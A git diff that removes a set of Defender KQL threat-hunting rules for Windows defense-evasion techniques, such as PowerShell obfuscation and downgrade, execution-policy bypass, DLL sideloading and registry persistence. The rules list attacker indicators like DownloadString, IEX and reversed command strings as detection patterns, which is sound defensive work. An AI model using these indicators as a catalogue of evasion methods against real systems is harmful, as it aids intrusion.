Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql deleted file mode 100644 index 617d3ee9..00000000 --- a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/17 -// Level: medium -// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique -// Tags: attack.persistence, attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql b/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql deleted file mode 100644 index 0af11ee9..00000000 --- a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Karneades, Jonhnathan Ribeiro, Florian Roth -// Date: 2018/04/11 -// Level: high -// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys -// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit")) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql b/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql deleted file mode 100644 index 901cfc87..00000000 --- a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) -// Date: 2020/10/15 -// Level: high -// Description: Detects the PowerShell command lines with special characters -// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql b/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql deleted file mode 100644 index 1a70acae..00000000 --- a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Harish Segar (rule) -// Date: 2020/03/20 -// Level: medium -// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql deleted file mode 100644 index ef414d97..00000000 --- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/11 -// Level: medium -// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql deleted file mode 100644 index 6c46475e..00000000 --- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/11 -// Level: high -// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted") \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql b/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql deleted file mode 100644 index 9ef6f39d..00000000 --- a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018/08/25 -// Level: high -// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. -This detection assumes that PowerShell commands are passed via the CommandLine. - -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql deleted file mode 100644 index b0d3f76d..00000000 --- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: high -// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc "))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql deleted file mode 100644 index 94151df4..00000000 --- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/07/09 -// Level: high -// Description: Detects suspicious encoded character syntax often used for defense evasion -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql b/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql deleted file mode 100644 index 7040127d..00000000 --- a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2021/07/01 -// Level: high -// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql deleted file mode 100644 index 1a2be179..00000000 --- a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql b/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql deleted file mode 100644 index 0b840a5c..00000000 --- a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova -// Date: 2020/10/14 -// Level: medium -// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ProcessCommandLine contains "SyncInvoke " \ No newline at end of file diff --git a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql b/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql deleted file mode 100644 index cd1604d6..00000000 --- a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alexander McDonald -// Date: 2022/06/24 -// Level: high -// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql deleted file mode 100644 index 65ae682e..00000000 --- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023/08/08 -// Level: high -// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\" \ No newline at end of file diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql deleted file mode 100644 index 413eb321..00000000 --- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/08/02 -// Level: high -// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". -// Tags: attack.defense_evasion, attack.t1218 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Provisioning\\Commands" \ No newline at end of file diff --git a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql b/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql deleted file mode 100644 index 3d2de651..00000000 --- a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023/08/08 -// Level: medium -// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql b/Defense Evasion/Potential_Qakbot_Registry_Activity.kql deleted file mode 100644 index ad4f810d..00000000 --- a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Hieu Tran -// Date: 2023/03/13 -// Level: high -// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "\\Software\\firm\\soft\\Name" \ No newline at end of file diff --git a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql deleted file mode 100644 index 0be2e25f..00000000 --- a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @neu5ron -// Date: 2019/02/07 -// Level: medium -// Description: Detects potential malicious and unauthorized usage of bcdedit.exe -// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql b/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql deleted file mode 100644 index dc23a7d8..00000000 --- a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/13 -// Level: high -// Description: Detects potential DLL sideloading of rcdll.dll -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql deleted file mode 100644 index 6e6b74ac..00000000 --- a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/30 -// Level: medium -// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow -// Tags: attack.execution, attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql b/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql deleted file mode 100644 index aacb4100..00000000 --- a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer @austinsonger -// Date: 2021/11/05 -// Level: medium -// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql b/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql deleted file mode 100644 index c2b94749..00000000 --- a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/07/13 -// Level: medium -// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n ")) \ No newline at end of file diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql deleted file mode 100644 index fef361b2..00000000 --- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: medium -// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll" \ No newline at end of file diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql deleted file mode 100644 index 172b3879..00000000 --- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: high -// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql b/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql deleted file mode 100644 index bd581c2f..00000000 --- a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/14 -// Level: medium -// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql b/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql deleted file mode 100644 index a90ebb2b..00000000 --- a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Harjot Singh, '@cyb3rjy0t' -// Date: 2023/01/21 -// Level: high -// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql b/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql deleted file mode 100644 index 1bf5a890..00000000 --- a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 -// Date: 2022/05/21 -// Level: medium -// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql deleted file mode 100644 index 5c5ff61b..00000000 --- a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: medium -// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql deleted file mode 100644 index 5e537033..00000000 --- a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: medium -// Description: Detects potential DLL sideloading of "ShellDispatch.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql deleted file mode 100644 index dcb505a7..00000000 --- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/11 -// Level: high -// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading") \ No newline at end of file diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql deleted file mode 100644 index cf35cdc2..00000000 --- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/12 -// Level: high -// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey contains "\\Policies\\Microsoft\\Windows\\Appx") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense") \ No 